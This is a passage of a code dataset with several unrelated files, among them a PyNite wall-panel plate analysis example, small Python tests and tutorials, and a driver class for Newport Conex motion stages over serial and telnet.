cs = ax.contourf(X, Y, z) #, 5)\n plt.colorbar(cs)\n ax.set(xlim=[0, max(x)], ylim=[0, max(y)], aspect=1)\n ax.set_title('Displacement')\n plt.show()\n\n#%%\n# +-----------------------------------------------+\n# | Rectangular Wall Panel Implementation Example |\n# +-----------------------------------------------+\n\nE = 57000*(4000)**0.5*12**2 # psf\nt = 1 # ft \nwidth = 10 # ft\nheight = 20 # ft \nnu = 0.17\nmeshsize = 1 # ft\nload = 250 # psf\n\nmyWall = RectWall(width, height, t, E, nu, meshsize, 'Fixed', 'Fixed', 'Fixed', 'Fixed')\nmyWall.add_load(0, height, load, load)\n\n# Analyze the wall. Ignore the profiling code commented out below. That's for my use in speeding up\n# the program.\n# import cProfile\n# cProfile.run('myWall.analyze()', sort='cumtime')\nmyWall.analyze()\n\n# +-----------------------+\n# | Discussion of Results |\n# +-----------------------+\n\n# MITC4 elements are very accurate, but there are some nuances to be aware of. They are described\n# below.\n\n# Render the wall. The default load combination 'Combo 1' will be displayed since we're not\n# specifying otherwise. The quad mesh will be set to show 'Mx' results.\nfrom PyNite import Visualization\nVisualization.RenderModel(myWall.fem, text_height=meshsize/6, deformed_shape=False, combo_name='Combo 1', color_map='Mx', render_loads=True)\n\n# The it should be noted that the rendered contours are smoothed. Smoothing averages the corner\n# stresses from every quad framing into each node. This leads to a much more accurate contour.\n# An unsmoothed plot would essentially show quad center stresses at the quad element corners.\n\n# Here are the expected results from Timoshenko's \"Theory of Plates and Shells\" Table 35, p. 202.\n# Note that the deflection values for the PyNite solution are slightly larger, due to transverse\n# shear deformations being accounted for.\nD = E*t**3/(12*(1-nu**2))\nprint('Solution from Timoshenko Table 35 for b/a = 2.0:')\nprint('Expected displacement: ', 0.00254*load*width**4/D)\nprint('Expected Mx at Center:', 0.0412*load*width**2)\nprint('Expected Mx at Edges:', -0.0829*load*width**2)\nprint('Expected My at Center:', 0.0158*load*width**2)\nprint('Expected My at Top & Bottom:', -0.0571*load*width**2)\n\n# It should be noted that even the smoothed Mx contours are off by nearly 30% from the theoretical\n# solution at the wall boundaries. Because there are no adjacent quads at the boundaries, PyNite\n# cannot smooth the results there, and center stresses are being reported at the boundaries\n# instead of corner stresses. So what's really going on here? Read on!\n\n# MITC4 elements are very accurate, but the internal bending stress results at the corners are not.\n# They are secondary values extrapolated from the derivatives of primary values. The corner bending\n# stresses appear to more accurately represent the bending stresses at the center of the element.\n# While corner STRESSES have this problem, the corner FORCES do not. To find the bending stresses\n# at the quad nodes we'll get the moment at the corner and divide it by 1/2 of the plate width to\n# convert it to a stress result. Note that when we talk about quad \"stresses\" we're really talking\n# about forces per unit length of the element.\n\n# With 200 quads in the model, quad 101 is on the left edge of the wall at mid-height, and carries\n# the maximum moment.\n\n# Get the force vector for quad 101\nf_vector = myWall.fem.GetQuad('Q101').f()\n\n# Although the MITC4 element nodes are defined by the user in the order [i, j, m, n], internally\n# PyNite formulates the plate in the order [m, n, i, j] to be consistent with the literature used\n# to derive this element. Therefore the MITC4 element's force vector is arranged as follows:\n# ************************************************************************************************************************************************************\n# f vector: [[fx_m, fy_m, fz_m, mx_m, my_m, mz_m, fx_n, fy_n, fz_n, mx_n, my_n, mz_n, fx_i, fy_i, fz_i, mx_i, my_i, mz_i, fx_j, fy_j, fz_j, mx_j, my_j, mz_j]]\n# index: [[ 0 , 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8 , 9 , 10 , 11 , 12 , 13 , 14 , 15 , 16 , 17 , 18 , 19 , 20 , 21 , 22 , 23 ]]\n# ************************************************************************************************************************************************************\n# nomenclature: fx_n = force in the local x-direction at the n-node\n# my_j = moment about the local y-axis at the j-node\n\n# We are interested in the moment applied to the i-node about the quad's local y-axis (my_i). This\n# is at index 16 in the f vector. Note that here Mx is the moment about the local y-axis, rather\n# than about it's local x-axis. This can be confusing, but is a commonly used plate nomenclature.\nMx = f_vector[16, 0]\n\n# We can find the max My moment similarly from quad 6\nf_vector_11 = myWall.fem.GetQuad('Q6').f()\nMy = f_vector_11[15, 0]\n\n# Now we'll convert these values to a force per unit length. The height and width of the plate is\n# `meshsize`.\nMx = Mx/(meshsize/2)\nMy = My/(meshsize/2)\n\n# Print the correct maximum bending moment:\nprint('Calculated maximum Mx (back-calculated from qaud nodal forces): ', Mx)\nprint('Calculated maximum My (back-calculated from qaud nodal forces): ', My)\n\n# These values are much closer to the Timoshenko solution than the direct stress results. The Mx\n# solution is within 1%, and the My solution is within about 6%. That is very good convergence for\n# the 1'x1' mesh size. If the mesh size is reduced to 0.5' the My solution is within about 4% of\n# the Timoshenko solution. It should also be remembered that even the Timoshenko solution is an\n# estimate.\n","sub_path":"Examples/Out-of-Plane Wall Panel - Quads.py","file_name":"Out-of-Plane Wall Panel - Quads.py","file_ext":"py","file_size_in_byte":19183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"564500913","text":"from cntent.spells.fire.concepts import burning_hands_concept\nfrom cntent.spells.runes import double_damage_rune\nfrom mechanics.actives import Active\n\ndef test_burning_hands(empty_game, hero, pirate_band):\n\n spell = burning_hands_concept.to_spell([double_damage_rune])\n\n hero.int_base += 100\n empty_game.add_unit(hero, 1+1j, facing=1+0j)\n new_active = hero.give_active( Active.from_spell( spell ) )\n\n p1, p2, p3 = pirate_band\n\n empty_game.add_unit(p1, 2+1j)\n empty_game.add_unit(p2, 3+1j)\n empty_game.add_unit(p3, 4+1j)\n\n hero.activate(new_active)\n\n assert p1.health < p1.max_health\n assert p2.health < p2.max_health\n assert p3.health < p3.max_health\n\n\n\n\n\n\n","sub_path":"tests/content/spells/test_fire.py","file_name":"test_fire.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"299163474","text":"from django.conf.urls import patterns, url\nfrom . import views\n\n\nurlpatterns = [\n url(r'^ajax/filebrowser/$', views.filebrowser),\n url(r'^ajax/fileupload/$', views.upload_images),\n url(r'^ajax/imagelist/$', views.recent_photos),\n url(r\"^ajax/upload/$\", views.upload_images, name=\"upload_images\")\n]\n","sub_path":"icmgeneric/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"627271623","text":"#given string is palindrome or not\ndef ispalindrome(s):\n if s==s[::-1]:\n return True\n return False\n#n=input(\"enter the value\")\nif ispalindrome(\"malayalam\"):\n print(\"palindrome\")\nelse:\n print(\"not a palindrome\")\n\n\n\n","sub_path":"practice prgms/palindrome or not.py","file_name":"palindrome or not.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"514648441","text":"\n# To create a new text file:\n\nf = open(\"new_text_file.txt\", \"w+\") # This is to create a new text file, w+ is for writing into a text file\n\nfor i in range(10):\n f.write(\"This is the line {} \\n\".format(i)) # Writing data into the text file\n\nf.close() # Closing the file is very important\n\n# OR\n# Another way of writing the file\n\nocean = ['Pacific', 'Atlantic', 'Indian', 'Arctic', 'Southern']\n\nwith open(\"new_textfile_without_close_fnc\", \"w\") as new: # No need to close the file using this\n for items in ocean:\n new.write(\"This is ocean {} \\n\".format(items))\n\n\n# To append data into a file :\n\nf = open(\"new_text_file.txt\", \"a+\")\n\nfor i in range(3):\n f.write(\"Appended line {} \\n\".format(i))\n\nf.close()\n\n# OR\n\nwith open(\"new_textfile_without_close_fnc\", \"a\") as foo:\n for i in range(2):\n foo.write(\"Appended line {} \\n\".format(i))\n\n\n# To read the contents of the file:\n\nf = open(\"new_text_file.txt\", \"r\")\ntext = f.read()\nf.close() # We have always to close the file at the end using this method\n\nprint(text)\n\n# OR\n\n# This is the best way to read the file and we need not to close it at the end. Python will close the file even if exception occurs in code\n\nwith open(\"new_text_file.txt\", \"r\") as foo:\n txt = foo.read()\n\n\nprint(txt)\nprint(foo.name)\nprint(foo.mode)\nprint(foo.closed)\n\nwith open(\"new_text_file.txt\", \"r\") as p:\n for line in p:\n print(line)\n\n # txt1 = p.readlines() # It will return the text lines in the form of list\n # print(txt1, end = '')\n\n\nwith open(\"new_text_file.txt\", \"r\") as rf:\n with open(\"test_copy.txt\", \"w\") as wf:\n for line in rf:\n wf.write(line) # Created a new file \"test_copy.txt and copied all the lines from new_text_file.txt\n\n# To copy the pictures, we need 'rb', 'wb' instead of 'r' and 'w' where b stands for binary","sub_path":"Basics/Working with different files in Python/Text File/textfile.py","file_name":"textfile.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"326407339","text":"from time import sleep\r\nfrom logging import debug\r\nimport telnetlib, serial\r\n\r\n#Should Modify:\r\n#Add method to class change serial timeout\r\n#Implement error checking at end of each write (TE)\r\n\r\nclass TimeoutError(Exception):\r\n \"\"\"An error to be thrown for movement timeout\"\"\"\r\n pass\r\n\r\nclass Conex_Device:\r\n '''Class for controlling the Newport Conex Stages\r\n \r\n Currently handles:\r\n - CONEX-AG-LS25\r\n - CONEX-AG-M100D\r\n '''\r\n\r\n DELAY = .05 #Number of seconds to wait after writing a message\r\n MVTIMEOUT = 600 #(MVTIMEOUTxDELAY)= number of seconds device will \r\n #wait before declaring a move timeout error\r\n \r\n def __init__(self):\r\n '''Constructor for Conex device'''\r\n\r\n # a variable to keep track of what kind of connection is open\r\n self.con_type = None\r\n \r\n #Other Instance Variables\r\n self.SN = 'DevNotOpenedYet' #Device serial number\r\n #self.SN also serves as flag to check if device has been opened\r\n self.TY = 'DevNotOpenedYet' #Device type\r\n self.FW = 'DevNotOpenedYet' #Device Revision Information\r\n self.lims = {} #Device limits\r\n\r\n #:::::::::::::::::::::::PORT MANAGEMENT FUNCTIONS:::::::::::::::::::::::::: \r\n def open_Serial(self, devnm:str, baud:int):\r\n \"\"\"Opens a serial connection to the device\r\n\r\n Also queries the device to obtain basic information to confirm communication\r\n\r\n Does not reopen the device if already open\r\n\r\n Args:\r\n devnm = the device name to connect to\r\n baud = the baudrate to connect at\r\n \"\"\"\r\n\r\n # if port is already open, return\r\n if not self.con_type is None:\r\n debug(\"(SN:{}) is already open\".format(self.SN))\r\n return\r\n\r\n debug(\"Connecting to serial: {}:{}...\".format(devnm, baud))\r\n self.con = serial.Serial()\r\n self.con.timeout = 3\r\n self.con.port = devnm\r\n self.con.baudrate = baud\r\n self.con.open()\r\n self.con_type = \"serial\"\r\n\r\n self.reqInfo()\r\n\r\n if self.TY.find(\"M100DD\") != -1:\r\n self.axes = {1:\"V\", 2:\"U\"}\r\n elif self.TY.find(\"LS25\") != -1:\r\n self.axes = {1:\"\"}\r\n elif self.TY.find(\"PR100P\") != -1:\r\n self.axes = {1:\"\"}\r\n else:\r\n raise Exception(\"Controller type not recognized: {}\".format(self.TY))\r\n\r\n debug('Device is a : %s \\n' %self.TY +\r\n 'Serial Number : %s \\n' %self.SN +\r\n 'Frameware vs. : %s \\n' %self.FW)\r\n \r\n self.reqLim()\r\n\r\n def open_Telnet(self, host:str, port:int):\r\n '''Opens a telnet connection to device\r\n Also queries the device to obtain basic information\r\n This serves to confirm communication\r\n *Does not reopen device if already open\r\n\r\n Args:\r\n host = the hostname of the telnet connection\r\n port = the port to connect to\r\n '''\r\n #Open port if not already open\r\n if not self.con_type is None:\r\n debug('(SN:%s) is already open' %self.SN)\r\n else:\r\n debug('Connecting to telnet: {}:{}...'.format(host, port))\r\n self.con = telnetlib.Telnet()\r\n self.con.open(host, port, 3)\r\n self.con_type = \"telnet\"\r\n \r\n #Send 'ID?' command to synchronize comms with device:\r\n #The first message sent after the device is powered up is \r\n #automatically ignored by the device. I did not want to send\r\n #'1RS' since this would reset the device everytime open() is called\r\n self.write('1ID?')\r\n self.readAll() #clear read buffer\r\n \r\n #Request Device Information\r\n self.reqInfo()\r\n \r\n if self.TY.find(\"M100D\") != -1:\r\n self.axes = {1:\"V\", 2:\"U\"}\r\n elif self.TY.find(\"LS25\") != -1:\r\n self.axes = {1:\"\"}\r\n elif self.TY.find(\"PR100P\") != -1:\r\n self.axes = {1:\"\"}\r\n else:\r\n raise Exception(\"Controller type not \"+\\\r\n \"recognized: {}\".format(self.TY))\r\n\r\n debug('Device is a : %s \\n' %self.TY +\r\n 'Serial Number : %s \\n' %self.SN +\r\n 'Frameware vs. : %s \\n' %self.FW )\r\n\r\n self.reqLim()\r\n \r\n def close(self):\r\n '''Closes the device connection'''\r\n if self.con_type is None:\r\n debug(\"Device is already closed\")\r\n else:\r\n self.con.close()\r\n self.con_type = None\r\n \r\n #:::::::::::::::::::::::WRITE/READ FUNCTIONS::::::::::::::::::::::::::::::: \r\n def write(self, MSG, append = None):\r\n '''Formats a string, 'MSG' and sends it to the device\r\n MSG should be the message as string (ex. '1ID?')\r\n Should NOT include CR\\LF\r\n Can append data (including numbers) to the end of the MSG\r\n *Data requests using 'write' should be followed by a read\r\n Otherwise unread items in buffer may cause problems\r\n **This function is useful for sending messages that do not\r\n have a dedicated function yet.\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return\r\n \r\n #convert 'append' and append to end\r\n if append != None:\r\n MSG = MSG + str(append)\r\n \r\n MSG = MSG + '\\n\\n'\r\n msg = MSG.encode()\r\n \r\n #Send message using telnet\r\n self.con.write(msg)\r\n \r\n def readAll(self):\r\n '''Returns the full read buffer or the first 50 lines\r\n Also serves as a 'flush' function to clear buffer itself\r\n Useful for debugging reads to ensure read data is as expected\r\n Returns the read data as bytes in bytearray\r\n Does NOT strip() CR\\LF at end of messages\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return\r\n\r\n cnt = 0\r\n resl = []\r\n res = self.read(tmt=.25)\r\n resl.append(res)\r\n while len(res) > 0 and cnt < 50:\r\n res = self.read(tmt=.25)\r\n resl.append(res)\r\n cnt += 1\r\n sleep(.05)\r\n if len(resl[-1]) == 0:\r\n resl.pop()\r\n return resl\r\n \r\n def read(self, tmt=1.0):\r\n '''Reads a single line from the readbuffer\r\n Strips the CR\\LF and decodes it into a string\r\n\r\n Inputs:\r\n tmt = timeout in seconds\r\n Returns:\r\n str = result of single-line read\r\n '''\r\n #Does not check if port is open to avoid slow-downs from checking\r\n #if port is open repeatedly when back-to-back reads are performed \r\n if self.con_type == \"telnet\":\r\n return self.con.read_until(bytes('\\r\\n', 'utf-8'), tmt).strip().decode('utf-8')\r\n elif self.con_type == \"serial\":\r\n self.con.timeout = tmt\r\n return self.con.readline().strip().decode(\"utf-8\")\r\n\r\n \r\n #:::::::::::::::::::::::STATE CHANGE FUNCTIONS:::::::::::::::::::::::::::::\r\n def home(self, isBlocking = False):\r\n '''Homes the device\r\n \r\n calls reset() first when called in isReady() or isMoving() state\r\n\r\n Inputs:\r\n isBlocking = True will block execution until homing completes\r\n Returns:\r\n -1 if no communication is open\r\n or\r\n str = the error code if an error occurred\r\n or\r\n None if there's no error\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n #Reset device to allow home() if needed\r\n if self.isReady() or self.isMoving(): self.reset()\r\n \r\n self.write('1OR') #execute home search\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\r\n ' ' + self.errorStr(erCd))\r\n return erCd\r\n \r\n #Wait for move to complete when isBlocking is set\r\n if isBlocking:\r\n tmtItr = 0; #Iteration counter for timeout\r\n while self.isHoming():\r\n if tmtItr > self.MVTIMEOUT: \r\n raise TimeoutError(\"Timeout on home.\")\r\n sleep(self.DELAY)\r\n tmtItr += 1\r\n \r\n def reset(self):\r\n '''Reset the device\r\n\r\n Returns:\r\n -1 if no communication is open\r\n or\r\n str = the error code if an error occurred\r\n or\r\n None if there's no error\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n self.write('1RS') #execute home search\r\n sleep(10*self.DELAY) #reset takes time to execute\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\r\n ' ' + self.errorStr(erCd))\r\n return erCd\r\n \r\n def stop(self):\r\n '''Stop all motion on the device\r\n\r\n Returns:\r\n -1 if no communication is open\r\n or\r\n str = the error code if an error occurred\r\n or\r\n None if there's no error\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n self.write('1ST') #execute home search\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\r\n ' ' + self.errorStr(erCd))\r\n return erCd\r\n \r\n def enable(self):\r\n '''Disables the device (set 'Enable' state)\r\n\r\n Returns:\r\n -1 if Communication is not open\r\n or \r\n str = error code if there's an error\r\n or\r\n None if no error\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n self.write('1MM1') #enter enable state\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\r\n ' ' + self.errorStr(erCd))\r\n return erCd\r\n\r\n def disable(self):\r\n '''Disables the device (set 'Disable' state)\r\n\r\n Returns:\r\n -1 if Communication is not open\r\n or \r\n str = error code if there's an error\r\n or\r\n None if no error\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n self.write('1MM0') #enter disable state\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\r\n ' ' + self.errorStr(erCd))\r\n return erCd\r\n \r\n #:::::::::::::::::::::::STATE CHECK FUNCTIONS:::::::::::::::::::::::::::::: \r\n def isReady(self) -> bool:\r\n '''Checks that the device is in a 'Ready' state\r\n\r\n Returns: \r\n bool = whether or not the device is in a ready state\r\n or\r\n -1 if communication is not open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n rd = []\r\n #get positioner error and controller state\r\n for axis in self.axes:\r\n self.write('1TS{}'.format(self.axes[axis]))\r\n rd.append(self.read())\r\n\r\n # state is in last two characters\r\n return all([item[-2:] in [\"32\", \"33\", \"34\", \"35\", \"36\"] for item in rd])\r\n \r\n def isDisable(self) -> bool:\r\n '''Checks that the device is in a 'Disable' state\r\n\r\n Returns: \r\n bool = whether or not the device is in a disable state\r\n or\r\n -1 if communication is not open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n rd = []\r\n #get positioner error and controller state\r\n for axis in self.axes:\r\n self.write('1TS{}'.format(self.axes[axis]))\r\n rd.append(self.read())\r\n\r\n # state is in last two characters\r\n return all([item[-2:] in [\"3C\", \"3D\"] for item in rd])\r\n \r\n def isReferenced(self) -> bool:\r\n '''Checks that the device is in a 'Referenced' state\r\n\r\n Returns: \r\n bool = whether or not the device is in a referenced state\r\n or\r\n -1 if communication is not open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n rd = []\r\n #get positioner error and controller state\r\n for axis in self.axes:\r\n self.write('1TS{}'.format(self.axes[axis]))\r\n rd.append(self.read())\r\n\r\n # state is in last two characters\r\n return all([item[-2:] in [\"0A\", \"0B\", \"0C\", \"0D\", \"0E\", \"0F\", \"10\"] for item in rd])\r\n \r\n def isConfiguration(self) -> bool:\r\n '''Checks that the device is in 'Configuration' state\r\n\r\n Returns: \r\n bool = whether or not the device is in configuration state\r\n or\r\n -1 if communication is not open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n rd = []\r\n #get positioner error and controller state\r\n for axis in self.axes:\r\n self.write('1TS{}'.format(self.axes[axis]))\r\n rd.append(self.read())\r\n\r\n # state is in last two characters\r\n return all([item[-2:] == \"14\" for item in rd]) \r\n \r\n def isHoming(self) -> bool:\r\n '''Checks that the device is in 'Homing' state\r\n\r\n Returns: \r\n bool = whether or not the device is in homing state\r\n or\r\n -1 if communication is not open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n rd = []\r\n #get positioner error and controller state\r\n for axis in self.axes:\r\n self.write('1TS{}'.format(self.axes[axis]))\r\n rd.append(self.read())\r\n\r\n # state is in last two characters\r\n return all([item[-2:] == \"1E\" for item in rd]) \r\n \r\n def isMoving(self, homing=True, ol=True) -> bool:\r\n '''Checks that the device is in 'Moving' state\r\n\r\n Inputs:\r\n homing = whether to check for homing as well\r\n ol = whether to check for open loop movement as well\r\n Returns: \r\n bool = whether or not the device is in moving state\r\n or\r\n -1 if communication is not open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n rd = []\r\n #get positioner error and controller state\r\n for axis in self.axes:\r\n self.write('1TS{}'.format(self.axes[axis]))\r\n rd.append(self.read())\r\n\r\n # Closed loop movement\r\n ret = all([stat[-2:] == \"28\" for stat in rd]) \r\n # Open loop step and jog (respectively)\r\n if ol: ret = (ret or all([stat[-2:] in [\"29\", \"46\"] for stat in rd]))\r\n # Homing\r\n if homing: ret = (ret or all([stat[-2:] == \"1E\" for stat in rd]))\r\n \r\n return ret\r\n \r\n #:::::::::::::::::::::::MOVE FUNCTIONS::::::::::::::::::::::::::::::::::::: \r\n def moveAbs(self, newPOS:dict, isBlocking:bool = False) -> dict:\r\n '''Moves device to newPOS.values() mm from current position\r\n\r\n Inputs:\r\n newPOS = keys as axes, values as amt to move\r\n isBlocking = whether this function blocks program until done\r\n Returns:\r\n dict = key as axis, value as error code\r\n or\r\n -1 if communications aren't open\r\n or\r\n None if no error\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n\r\n #Check that all axes are valid\r\n if not all([1 if axis in self.axes else 0 for axis in newPOS]):\r\n msg = \"Invalid axis. Available axes: \" + str(list(self.axes.keys()))\r\n raise ValueError(msg)\r\n\r\n err = {}\r\n for axis in self.axes:\r\n #move absolute\r\n self.write('1PA{}{}'.format(self.axes[axis], newPOS[axis]))\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\\\r\n ' ' + self.errorStr(erCd))\r\n err[axis] = erCd\r\n\r\n #Wait for move to complete when isBlocking is set\r\n if isBlocking:\r\n tmtItr = 0; #Iteration counter for timeout\r\n while self.isMoving():\r\n if tmtItr > self.MVTIMEOUT:\r\n msg = \"Timeout on absolute move: {}\".format(relMOV)\r\n raise TimeoutError(msg)\r\n sleep(self.DELAY)\r\n tmtItr += 1\r\n\r\n if len(err) > 0: return err\r\n else: return\r\n \r\n def moveRel(self, relMOV:dict, isBlocking:bool = False) -> dict:\r\n '''Moves device relMOV.values() mm from current position\r\n\r\n Inputs:\r\n relMOV = keys as axes, values as amt to move\r\n isBlocking = whether this function blocks program until done\r\n Returns:\r\n dict = key as axis, value as error code\r\n or\r\n -1 if communications aren't open\r\n or\r\n None if no error\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n\r\n #Check that all axes are valid\r\n if not all([1 if axis in self.axes else 0 for axis in relMOV]):\r\n msg = \"Invalid axis. Available axes: \" + str(list(self.axes.keys()))\r\n raise ValueError(msg)\r\n\r\n err = {}\r\n for axis in self.axes:\r\n #move relative\r\n self.write('1PR{}{}'.format(self.axes[axis], relMOV[axis]))\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\\\r\n ' ' + self.errorStr(erCd))\r\n err[axis] = erCd\r\n\r\n #Wait for move to complete when isBlocking is set\r\n if isBlocking:\r\n tmtItr = 0; #Iteration counter for timeout\r\n while self.isMoving():\r\n if tmtItr > self.MVTIMEOUT:\r\n msg = \"Timeout on relative move: {}\".format(relMOV)\r\n raise TimeoutError(msg)\r\n sleep(self.DELAY)\r\n tmtItr += 1\r\n\r\n if len(err) > 0: return err\r\n else: return\r\n\r\n #:::::::::::::::::::::::ERROR CHECK FUNCTIONS:::::::::::::::::::::::::::::: \r\n def isError(self):\r\n #Uses TE to reduce read time\r\n '''Checks for device errors\r\n Returns:\r\n boolean True/False to mark if an error occurred\r\n str with error code returned by device\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n #Read error\r\n self.write('1TE') #get command error string\r\n rd = self.read()\r\n \r\n #Check if error occurred and return accoridingly\r\n erCd = rd[3:]\r\n erFlg = False\r\n if erCd != '@':\r\n #error occurred\r\n erFlg = True\r\n return erFlg, erCd\r\n \r\n def errorStr(self, erCd):\r\n '''Translates the error code ,'erCd', to a readable string\r\n Returns:\r\n str with text describing the error code\r\n *If device is not open(), the code itself is returned\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('WARNING::: Device must be open to translate string\\n' + \r\n ' solution: call open()')\r\n return erCd\r\n \r\n #Send error code to device for translation\r\n self.write('1TB{}'.format(erCd)) #get command error string\r\n rd = self.read() \r\n \r\n if rd[3:4] != erCd:\r\n debug('ERRORR::: Device did not recognize provided error code')\r\n return 'Unrecognized Error Provided: ' + erCd\r\n else:\r\n return rd[3:]\r\n\r\n #:::::::::::::::::::::::POSITION CHECK FUNCTIONS::::::::::::::::::::::::::: \r\n def reqPosSet(self) -> dict:\r\n '''Requests the target position\r\n\r\n Returns:\r\n dict = keys as axes, values as position or -9999 if error\r\n if there is an error, another dict is returned with error codes\r\n or\r\n -1 if communication isn't open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n ret = {}\r\n err = {}\r\n for axis in self.axes:\r\n self.write('1TH{}'.format(self.axes[axis])) #get target position\r\n rd = self.read()[3:]\r\n rd = rd[len(self.axes[axis]):]\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\r\n ' ' + self.errorStr(erCd))\r\n ret[axis] = -9999\r\n err[axis] = erCd\r\n else: ret[axis] = float(rd)\r\n\r\n if len(err) > 0: return ret, err\r\n else: return ret\r\n \r\n def reqPosAct(self) -> dict:\r\n '''Requests the current position\r\n\r\n Returns:\r\n dict = keys as axes, values as position or -9999 if error\r\n if there is an error, another dict is returned with error codes\r\n or\r\n -1 if communication isn't open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n ret = {}\r\n err = {}\r\n for axis in self.axes:\r\n self.write('1TP{}'.format(self.axes[axis])) #get current position\r\n rd = self.read()[3:]\r\n rd = rd[len(self.axes[axis]):]\r\n \r\n #Check for errors\r\n erFlg, erCd = self.isError()\r\n if erFlg:\r\n debug('DEV ERROR::: Device returned error:\\n' +\r\n ' ' + self.errorStr(erCd))\r\n ret[axis] = -9999\r\n err[axis] = erCd\r\n else: ret[axis] = float(rd)\r\n \r\n if len(err) > 0: return ret, err\r\n else: return ret\r\n\r\n def reqInfo(self):\r\n '''Reads device information and updates variables\r\n *These values usually don't change so accessing them from the \r\n instance variable is more efficient than repeating a call to \r\n reqInfo()\r\n *To simply display values, use devPrint()\r\n Returns: \r\n Serial number, device number, revision version\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n #Request and read device information\r\n self.write('1ID?') #Get stage identifier\r\n rd = self.read()\r\n \r\n #Format and set SN and TY instance variables\r\n self.SN = rd[18:25] \r\n self.TY = rd[3:14] \r\n \r\n #Request and read revision information\r\n self.write('1VE') #Get controller revision information \r\n rd = self.read()\r\n \r\n #Format and set FW instance variable\r\n self.FW = rd[15:]\r\n \r\n def reqLim(self) -> dict:\r\n '''Reads device software limits and updates variables\r\n *These values usually don't change so accessing them from the \r\n instance variable is more efficient than repeating a call to \r\n reqLim()\r\n *To simply display the values, use devPrint()\r\n Returns: \r\n dict = keys as axes, values as lists: index 0 = min, index 1 = max\r\n or\r\n -1 if communication isn't open\r\n '''\r\n #Check if port is open\r\n if self.con_type is None:\r\n debug('ERROR::: Device must be open\\n' + \r\n ' solution: call open()')\r\n return -1\r\n \r\n for axis in self.axes: \r\n #Request and read lower limit\r\n self.write('1SL{}?'.format(self.axes[axis]))\r\n rd = self.read()[3:]\r\n rd = rd[len(self.axes[axis]):]\r\n \r\n #Format and set MNPS instance variable\r\n temp_lim = [float(rd)]\r\n \r\n #Request and read upper limit\r\n 